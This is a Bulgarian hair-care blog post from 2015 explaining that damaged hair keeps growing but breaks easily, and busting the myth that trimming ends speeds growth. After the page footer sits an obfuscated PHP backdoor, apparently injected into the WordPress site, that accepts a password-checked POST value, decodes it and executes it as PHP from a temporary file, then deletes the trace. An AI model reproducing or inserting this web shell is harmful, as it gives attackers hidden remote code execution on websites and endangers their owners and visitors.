Спира ли да расте увредената коса? | Косопад

Спира ли да расте увредената коса?

kosata-ne-raste

Промяна в храненето, небалансирано хранене, прекаляване с пресата и сешоара… Различни фактори променят вида и качеството на косата. Доста е разпространено мнението, че косата спира да расте, когато е увредена. Ето каква е истината:

Може ли косата да спре да расте?

Да, възможно е косата да спре да расте. Също така, растежът може да по- бавен заради недостиг на желязо, протеини. Хормоналните аномалии също много влияят, най- вече свързаните с щитовидната жлеза. Приемът на определени лекарства също нарушава растежа на косата.

Расте ли увредената коса (суха, нацъфтяла, слаба) по- бавно от здравата?

Не. Много хора си мислят, че увредената коса спира да расте. Само изглежда, че не расте, защото лесно се къса. Върховете са най- потърпевши и най- лесно се късат.

kosa-uvredena-1

Какво може да влоши състоянието на косата?

Най- лошото влияние за косата идва от агресивна козметика или от уреди като сешоар, преса и маша. Също прекалено силовото разресване на косата. Някои болести също се отразяват доста зле на косата.

Как да помогнете за растежа на увредената коса?

Първо, трябва да спрете гореизброените видове агресия спрямо косата си. Хранете се здравословно и балансирано и не пушете.

Ускорява ли растежа подстригването на връхчетата?

Това е абсолютен мит. Косата расте от корените, така че връхчетата не могат да влияят върху процеса.

03. ноември 2015 16:03:27 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}